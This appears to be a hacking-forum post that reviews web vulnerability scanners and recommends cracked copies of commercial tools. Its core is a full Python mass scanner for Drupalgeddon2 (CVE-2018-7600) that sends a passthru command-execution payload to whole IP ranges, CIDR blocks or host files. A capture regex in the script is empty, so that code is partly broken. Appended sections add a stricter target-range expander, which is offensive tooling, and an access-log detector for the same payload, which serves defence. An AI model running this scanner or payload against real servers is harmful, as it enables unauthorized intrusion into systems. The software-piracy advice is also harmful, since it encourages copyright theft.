mesvak

DIFF WAYS FOR FINDING VULN OF SITES (SCANNERS)

WELP, THE THING THAT I CAN SAY IS THAT THERE ARE INFINITE METHODS AND SCANNERS WRITTEN IN DIFF LANGS.

HERE I WILL GO AHEAD AND STRAIGHT-UP HIT THE POT.

1- ACUNETIX: WELP, AS ALL OF U MIGHT OR MIGHT NOT KNOW ABOUT THIS SHIT, THIS IS KINDA GOOD SHIT FOR FINDING VULNS AND EXPLOITS (XSS, LFI, CRLF, SQL, SHELLS, EXPLOITS, ...)

2-PYMAP SCANNER (https://github.com/azizaltuntas/Pymap-Scanner)

TAKE A LOOK AT IT, IT'S NOT BAD.

3- WAPITI: tbh I had fun with this tool and it's perfect, and I can say the privileges are injecting XXE, XSS, CRLF, XPath and one HQ shit: executing commands, ooooof.

It's gud, idk whether you can find the new version or something like this now, cause I used it like one year ago (version 3).

(
    Generates vulnerability reports in various formats (HTML, XML, JSON, TXT)
    Can suspend and resume a scan or an attack
    Can give you colors in the terminal to highlight vulnerabilities
    Different levels of verbosity
    Adding a payload can be as easy as adding a line to a text file
    Support HTTP and HTTPS proxies
    Authentication via several methods: Basic, Digest, Kerberos or NTLM
    Ability to restrain the scope of the scan (domain, folder, webpage)
    Safeguards against scan endless-loops (max number of values for a parameter)
    Can exclude some URLs of the scan and attacks (e.g. logout URL)
    Extract URLs from Flash SWF files
    Try to extract URLs from javascript (very basic JS interpreter)
)

4- damn fucking freaky vuln finder, oooof, such a significant one 3 years ago, I can say one of the first apps I tried.

https://github.com/ethicalhack3r/DVWA  welp, one suggestion: don't use it on your devices or whatsoever, go on RDP or open it in VirtualBox, and tbh it's not useful anymore, I don't think so.

5- https://github.com/almandin/fuxploider   fuxploider, written in Python, not bad, didn't work too much with this one.

6- Netsparker: this is so good cz it's updatable and the new version got cracked ezily, so it's a good version to have a look at.

I have version 5.000.something, it's kinda good but I don't use it tbh.

7- sqlmap: it's fucked up, but for the beginning it's good; after a while it gets fucking boring and so shitty af. I would rather do it by my own hands than trust this, or do it with multiple shits like Acunetix and sqlmap and one more.

8- https://github.com/zigoo0/webpwn3r   the beginning of my learning to get the py out of shit was with this, not only this but yeah it helped me, so this is gud and it's simple: only three files, one is a pain and the other 2 are simple, just understand the main one and u will get how to code something like a scanner ....

And there are some more like z3nom & zarp .......

but tbh I would suggest you guys code the scanner with ur own hands, it's not a big deal tbh, as you can see all of 'em are just too ez to be coded, just a lil bit of training.

one code which is rly good to have a look at:

# written by msv

import argparse
import ipaddress
import itertools
import re
import requests
import sys
import time

# functions: check each target for CVE-2018-7600 (Drupalgeddon2) and report the result
def exploit(ip_targets):
   send_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'id', 'name[#type]':'markup'}
   send_data = {'form_id':'user_pass', '_triggering_element_name':'name'}
   ipregex = re.compile(r"(\d{1,3}\.){3}\d{1,3}.*")   # raw string, so the backslashes are not invalid escapes
   num_scanned = len(ip_targets)
   num_vuln = 0
   time_start = time.time()
   for ip_target in ip_targets:
       result = ipregex.match(ip_target)
       ip_target = "http://"+ip_target
       if result is not None:
           r = None
           print("{:=<74}".format(""))
           print("[~] {:<60} [{:^7}]".format(ip_target, "..."), end="", flush=True)
           if verbose == True:
               try:
                   r = requests.post(ip_target, data=send_data, params=send_params, timeout=3)
               except requests.exceptions.Timeout:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Server seems to be down (Timeout)".format("--"))
                   continue
               except requests.exceptions.ConnectionError:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Unable to connect to the webserver (Connection Error)".format("--"))
                   continue
               except requests.exceptions.HTTPError:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: 4xx/5xx".format("--"))
                   continue
               except requests.exceptions.InvalidURL:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Invalid URL.".format("--"))
                   continue
               except Exception:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Unexpected Error".format("--"))
                   sys.exit()
               else: 
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK"))
                   print("{:>7} OK: Alive".format("--"))
           else:
               try:
                   r = requests.post(ip_target, data=send_data, params=send_params, timeout=5)
               except Exception:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   continue
               else:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK"))

           #Finding block of data (form_build_id) to check server type ffs
           #NOTE: the capture pattern is empty in the posted copy, so m.group(1) below raises IndexError
           m = re.search(r'', r.text)
           if m:
               if verbose == True:
                   print("{:>7} OK: Server seems to be running Drupal".format("--"))
               found = m.group(1)
               send_params2 = {'q':'file/ajax/name/#value/' + found}
               send_data2 = {'form_build_id':found}
               r = requests.post(ip_target, data=send_data2, params=send_params2)
               r.encoding = 'ISO-8859-1'
               out = r.text.split("[{")[0].strip()
               if out == "":
                   print("{:>7} Patched (CVE-2018-7600)".format("--"))
                   continue
               else: 
                   print("{:>7} Vulnerable (CVE-2018-7600)".format("--"))
                   num_vuln += 1
           else:
               print("{:>7} Doesn't seem like a Drupal server?".format("--"))
               continue
       else:
           raise ValueError("Invalid IP Address")
   time_fin = time.time()
   print("{:=<74}".format(""))
   print("[+] {} target(s) scanned, {} target(s) vulnerable (CVE-2018-7600)".format(num_scanned, num_vuln))
   print("[+] Scan completed in {:.3f} seconds".format(time_fin-time_start))

def process_file(target):
   hostlist = []
   try:
       # one target per line; 'with' closes the file even when exploit() raises
       with open(target, "r") as file:
           for line in file:
               hostlist.append(line.strip())
       exploit(hostlist)
   except FileNotFoundError:
       print("[!] Unable to locate file. Check file path.")
       sys.exit()
   except ValueError:
       print("[!] Invalid value in file. Ensure only IPv4 addresses exist!")
       sys.exit()
   except Exception as e:
       print(e)
       print("[!] Unexpected Error! contact me")
       sys.exit()

def process_multiple(target):
   # strip whitespace around each comma-separated entry before scanning
   hostlist = [data.strip() for data in target.split(",")]
   try:
       exploit(hostlist)
   except ValueError:
       print("[!] Invalid Input. Only IPv4 addresses are accepted.")
       sys.exit()
   except Exception:
       print("[!] Unexpected Error! contact me")
       sys.exit()

def process_range(target):
   try:
       hostlist = []
       raw_octets = target.split(".")
       octets = [x.strip().split("-") for x in raw_octets]
       octet_range = [range(int(x[0]), int(x[1])+1) if len(x) == 2 else x for x in octets]
       for x in itertools.product(*octet_range):
           hostlist.append('.'.join(map(str,x)).strip())
       exploit(hostlist)
   except ValueError:
       print("[!] Invalid Input. Only IPv4 ranges are accepted.")
       sys.exit()
   except Exception as e:
       print(e)
       print("Unexpected Error")
       sys.exit()

def process_ip(target):
   try:
       exploit([target.strip()])
   except ValueError:
       print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--"))
       sys.exit()
   except Exception:
       print("[!] Unexpected Error! contact me")
       sys.exit()

def process_cidr(target):
   hostlist = []
   try:
       net = ipaddress.ip_network(target.strip(), strict=False)
       for host in net.hosts():
           hostlist.append(str(host))
       exploit(hostlist)
   except ValueError:
       print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--"))
       sys.exit()
   except Exception:
       print("[!] Unexpected Error! contact me")
       sys.exit()

#main here
def main():
   parser = argparse.ArgumentParser(prog="drupalgeddon2-scan.py",
   formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50))
   try:
       parser.add_argument("target", help="IP of target site(s)")
       parser.add_argument('-c', "--cidr", default=False, action="store_true", help="Generate & scan a range given a CIDR address")
       parser.add_argument('-f', "--file", default=False, action="store_true", help="Retrieve IP Addresses from a file (1 per line)")
       parser.add_argument('-i', "--ip", default=True, action="store_true", help="Single IP Address (CIDR migrated to a separate mode)")
       parser.add_argument('-m', "--multiple", default=False, action="store_true", help="Multiple IP Addresses e.g. 192.168.0.1,192.168.0.2,192.168.0.3")
       parser.add_argument('-r', "--range", default=False, action="store_true", help="IP Range e.g. 192.168.1-2.0-254 (nmap format)")
       parser.add_argument('-v', "--verbose", default=False, action="store_true", help="Provide a more verbose display")
       parser.add_argument("-o", "--http-only", default=False, action="store_true", help="To be implemented (Current state, https not implemented)")
       parser.add_argument("-s", "--https-only", default=False, action="store_true", help="To be implemented")
   except Exception:
       print("[!] Unexpected Error! contact me")
       sys.exit()
   try:
       args, u = parser.parse_known_args()
   except Exception:
       print("[!] Invalid arguments!")
       sys.exit()

   #renaming variable
   global verbose 
   verbose = args.verbose

   #Verbose message
   print("[~] Starting scan...")

   #IP range in a CIDR format
   if args.cidr == True:
       process_cidr(args.target)

   #IPs from a file
   elif args.file == True:
       process_file(args.target)

   #Multiple IPs (separated w commas)
   elif args.multiple == True:
       process_multiple(args.target)

   #IP Range (start-end)
   elif args.range == True:
       process_range(args.target)

   #IP Address/CIDR
   elif args.ip == True:
       process_ip(args.target)
       
   #Unrecognised arguments
   else:
       print("[!] Unexpected Outcome! contact me")
       sys.exit()
   sys.exit()

#ifmain here
if __name__ == "__main__":
   try:
       main()
   except KeyboardInterrupt:
       print("\n-- Ctrl+C caught. Terminating program.")
   except Exception as e:
       print(e)
       print("[!] Unexpected Error! contact me")
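The posted script builds its target list in process_range, process_cidr and process_multiple without checking octet bounds, rejecting malformed ranges, or de-duplicating hosts that appear in more than one input. The following is an added example (not code from the post or its author) of a validated target-list expander that covers the same input forms in one function and goes a little beyond the script: a single IPv4 address, a comma-separated list, nmap-style octet ranges like 192.168.1-2.0-254, and CIDR. The function names, the regex and the sample input are my own.

```python
# Added example, not from the original post: a validated target expander for the
# same input modes the posted scanner accepts (single IP, comma list, nmap-style
# octet ranges, CIDR). Names and sample data are constructed for this example.
import ipaddress
import itertools
import re

# one octet spec: "5" or "1-3"
OCTET_RE = re.compile(r"^(\d{1,3})(?:-(\d{1,3}))?$")

def expand_octet(spec):
    """'5' -> [5], '1-3' -> [1, 2, 3]; anything outside 0-255 or malformed is rejected."""
    m = OCTET_RE.match(spec.strip())
    if not m:
        raise ValueError("bad octet spec: %r" % spec)
    lo = int(m.group(1))
    hi = int(m.group(2)) if m.group(2) is not None else lo
    if not (0 <= lo <= hi <= 255):
        raise ValueError("octet out of range: %r" % spec)
    return list(range(lo, hi + 1))

def expand_range(spec):
    """nmap-style range, e.g. '192.168.1-2.0-3', -> list of dotted addresses."""
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError("expected four octets: %r" % spec)
    parts = [expand_octet(o) for o in octets]
    # itertools.product varies the last octet fastest, matching nmap's ordering
    return [".".join(map(str, combo)) for combo in itertools.product(*parts)]

def expand_cidr(spec):
    """CIDR -> usable host addresses (network and broadcast excluded for /30 and larger)."""
    net = ipaddress.ip_network(spec.strip(), strict=False)
    if net.version != 4:
        raise ValueError("IPv4 only: %r" % spec)
    return [str(h) for h in net.hosts()]

def expand_targets(spec):
    """Accept a comma-separated mix of single IPs, nmap-style ranges and CIDRs.
    Returns a de-duplicated list in first-seen order."""
    seen = set()
    out = []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "/" in item:
            hosts = expand_cidr(item)
        elif "-" in item:
            hosts = expand_range(item)
        else:
            ipaddress.IPv4Address(item)  # raises ValueError on anything that is not an IPv4 address
            hosts = [item]
        for h in hosts:
            if h not in seen:
                seen.add(h)
                out.append(h)
    return out

if __name__ == "__main__":
    # constructed input: a range and a CIDR that overlap, plus a duplicate single IP
    targets = expand_targets("10.0.0.1-3, 10.0.0.0/30, 10.0.0.2")
    print(len(targets), targets)
```

Because every entry passes through expand_octet or ipaddress, a typo such as 192.168.1-300.1 fails loudly before any request is sent, instead of being raised half-way through a scan the way the posted exploit() does.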

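Seen from the server side, the requests the posted scanner sends are easy to pick out of an access log: the render-array keys it puts in the query string (name[#post_render][], name[#markup], name[#type]) and the second-stage path file/ajax/name/#value/... all carry a literal `#`, which a browser would treat as a fragment and never send, so it only reaches the server percent-encoded as %23 in a crafted request. Added example, not part of the original post: a small detector for that request shape run over a few constructed Apache combined-log lines. The regexes, function names and log lines are constructed for this example.

```python
# Added example, not from the original post: flag access-log requests that carry
# Drupal render-array keys ('#...') in the URL, the shape the posted scanner sends.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "METHOD url PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Render-array property keys start with '#'. Browsers strip fragments, so a '#'
# inside a query parameter name or a path segment had to be sent deliberately.
RENDER_KEY_RE = re.compile(r"\[#[a-z_]+\]|/#[a-z_]+(?:/|$)")

def parse_line(line):
    """Split one combined-log line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(url):
    """Return a short reason if the URL carries a render-array key, else None.
    Checks the decoded path, the decoded query string and Drupal's 'q' parameter
    (which holds the internal path when clean URLs are off)."""
    parts = urlsplit(url)
    decoded_path = unquote_plus(parts.path)
    decoded_query = unquote_plus(parts.query)
    q = dict(parse_qsl(parts.query, keep_blank_values=True)).get("q", "")
    for text in (decoded_path, decoded_query, q):
        m = RENDER_KEY_RE.search(text)
        if m:
            return "render-array key %s in request" % m.group(0)
    return None

def scan_log(lines):
    """Run classify() over log lines; return one dict per suspicious request."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        if not fields:
            continue
        reason = classify(fields["url"])
        if reason:
            hits.append({"ip": fields["ip"], "ts": fields["ts"], "method": fields["method"],
                         "url": fields["url"], "reason": reason})
    return hits

# Constructed sample: a benign login-page fetch, the two stages of the probe the
# posted scanner sends (query string percent-encoded the way requests sends it),
# and an unrelated benign request from another client.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2018:12:00:01 +0000] "GET /?q=user%2Fpassword HTTP/1.1" 200 5123
203.0.113.7 - - [10/Apr/2018:12:00:02 +0000] "POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=id&name%5B%23type%5D=markup HTTP/1.1" 200 7410
203.0.113.7 - - [10/Apr/2018:12:00:03 +0000] "POST /?q=file%2Fajax%2Fname%2F%23value%2Fform-abc123 HTTP/1.1" 200 88
198.51.100.4 - - [10/Apr/2018:12:00:04 +0000] "GET /node/1?page=2 HTTP/1.1" 200 4010
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print("{ip} {method} {url} -> {reason}".format(**hit))
```

Only the query string is visible in a standard access log, which is enough here: the scanner passes its render-array keys as URL parameters and only form_id in the POST body. Pairing the stage-1 hit with a stage-2 file/ajax/.../#value/ request from the same client within a few seconds is the pattern to alert on, since the second stage is what actually triggers the callback.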
Good post, my friend. Would love to get a good cracked version of Acunetix.
